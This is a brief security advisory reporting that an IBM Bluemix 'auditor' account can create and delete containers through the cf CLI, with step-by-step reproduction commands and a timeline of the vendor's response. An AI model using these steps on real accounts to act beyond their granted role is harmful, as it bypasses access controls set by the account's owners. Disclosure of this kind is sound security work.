Bluemix Container Authorization Controls
Posted on 12 December 2016
# Date : 09/12/2016 # Author : Oscar Martinez # Tested on:cf version 6.22.1+6b7af9c-2016-09-24 / Docker version 1.12.3, build 6b644ec / API endpoint: https://api.ng.bluemix.net (API version: 2.54.0) API endpoint: https://api.ng.bluemix.net (API version: 2.54.0) # Vendor : IBM # Software : bluemix https://www.ibm.com/cloud-computing/bluemix/ # Vulnerability Description: It is assumed that a user with auditor role should not be able to create or delete containers. reference: https://console.ng.bluemix.net/docs/admin/users_roles.html But, a user with auditor role CAN create or delete containers using the cli CF. 1. Connect to bluemix using the cli CF with the user with "auditor" role. 1.1 cf login [-sso] 1.2 cf ic init 2. Show the images 2.1 cf ic images 3. Create the container 3.1 cf ic run --name broken_access_666 -p 8080 -m 512 registry.ng.bluemix.net/[your site]/[your image] example: cf ic run --name broken_access_666 -p 8080 -m 512 registry.ng.bluemix.net/mysite/tomcat 4. Delete your container cf ic stop [your container] cf ic rm [your container] example: cf ic stop broken_access_666 cf ic rm broken_access_666 Time Line --------- * 2016/11/28: First contact with vendor ( https://www.ibm.com/scripts/contact/contact/us/en/security_vulnerabilities/) * 2016/11/28: IBM PSIRT assigned PSIRT Advisory <7263> * 2016/12/08: IBM PSIRT answered by email "issue is working as designed "
